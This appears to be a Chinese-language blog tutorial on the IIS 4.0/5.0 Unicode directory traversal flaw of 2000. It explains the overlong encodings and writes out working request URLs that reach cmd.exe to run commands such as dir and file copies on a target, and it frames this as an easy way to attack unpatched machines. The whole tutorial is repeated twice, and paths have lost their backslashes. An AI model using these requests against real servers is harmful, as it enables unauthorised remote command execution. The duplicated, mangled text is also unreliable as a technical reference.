close
今天我們談談unicode漏洞,這可是基礎中的基礎,重點裡的重點,不懂的一定要好好學。
2000年10月17日中聯綠盟發佈了以下的安全公告:
微軟IIS 4.0 / 5.0 擴展UNICODE目錄遍歷漏洞
遠程漏洞:是
本地漏洞:是
發佈日期:2000年10月17日
更新日期:2000年10月17日
受影響的版本:
Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0
這可是中國乃至全球網絡安全界的一次大變節,入侵nt/2000系統變得如此簡單,不打補丁的死路一條。
下面開始正式學習:
一,UNICODE漏洞的原理
此漏洞從中文IIS4.0+SP6開始,還影響中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1, 台灣繁體中文也同樣存在這樣的漏洞。
中文版的WIN2000中,UNICODE編碼 存在BUG,在UNICODE 編碼中
%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ''
在NT4中/編碼為%c1%9c
在英文版裡: WIN2000英文版%c0%af
在中文win2k裡:%c1%1c
此外還有多種編碼,不一一闡述。
本文例子均以win2k為準,其他類型請自行替換。
二,一切從基礎開始
由於winntsystem32cmd.exe的存在,使遠程執行命令變為可能,在瀏覽器裡輸入以下請求:(假設11.11.22.22有漏洞)
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
學過dos的應該可以看懂,其實就是利用當中的非法請求使我們可以連到system32下,如果inetpub目錄不合winnt同盤,或者目錄級數有改動,可能會引起請求失敗。
如果成央A那麼在瀏覽區可看到如下信息:
Directory of C:inetpubscripts
2000-09-28 15:49 〈DIR〉 .
2000-09-28 15:49 〈DIR〉 .. (假設目錄中沒有文件,實際上有一大堆)
是不是有自己機器的感覺了,正點!就是這種感覺!
cmd.exe相當與dos裡的command.com,因此,我們可以執行很多命令了!
http://11.11.22.22/msadc/..%c1%1c...../cmd.exe?/c+dir (這個命令同樣道理)
大家請注意:/c後面的+,實際上,他就是空格,請記牢!dir開始就是dos命令了,我們可以更改一下:
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:autoexec.bat+c:winntauto.exe
會dos的朋友一定懂其意義了,不懂的請去看書 .
不用說,大家也知道我們就可以利用它來對有漏洞的機器展開攻擊了!
2000年10月17日中聯綠盟發佈了以下的安全公告:
微軟IIS 4.0 / 5.0 擴展UNICODE目錄遍歷漏洞
遠程漏洞:是
本地漏洞:是
發佈日期:2000年10月17日
更新日期:2000年10月17日
受影響的版本:
Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0
這可是中國乃至全球網絡安全界的一次大變節,入侵nt/2000系統變得如此簡單,不打補丁的死路一條。
下面開始正式學習:
一,UNICODE漏洞的原理
此漏洞從中文IIS4.0+SP6開始,還影響中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1, 台灣繁體中文也同樣存在這樣的漏洞。
中文版的WIN2000中,UNICODE編碼 存在BUG,在UNICODE 編碼中
%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ''
在NT4中/編碼為%c1%9c
在英文版裡: WIN2000英文版%c0%af
在中文win2k裡:%c1%1c
此外還有多種編碼,不一一闡述。
本文例子均以win2k為準,其他類型請自行替換。
二,一切從基礎開始
由於winntsystem32cmd.exe的存在,使遠程執行命令變為可能,在瀏覽器裡輸入以下請求:(假設11.11.22.22有漏洞)
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
學過dos的應該可以看懂,其實就是利用當中的非法請求使我們可以連到system32下,如果inetpub目錄不合winnt同盤,或者目錄級數有改動,可能會引起請求失敗。
如果成央A那麼在瀏覽區可看到如下信息:
Directory of C:inetpubscripts
2000-09-28 15:49 〈DIR〉 .
2000-09-28 15:49 〈DIR〉 .. (假設目錄中沒有文件,實際上有一大堆)
是不是有自己機器的感覺了,正點!就是這種感覺!
cmd.exe相當與dos裡的command.com,因此,我們可以執行很多命令了!
http://11.11.22.22/msadc/..%c1%1c...../cmd.exe?/c+dir (這個命令同樣道理)
大家請注意:/c後面的+,實際上,他就是空格,請記牢!dir開始就是dos命令了,我們可以更改一下:
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:autoexec.bat+c:winntauto.exe
會dos的朋友一定懂其意義了,不懂的請去看書 .
不用說,大家也知道我們就可以利用它來對有漏洞的機器展開攻擊了!
全站熱搜
留言列表
資訊 (5)
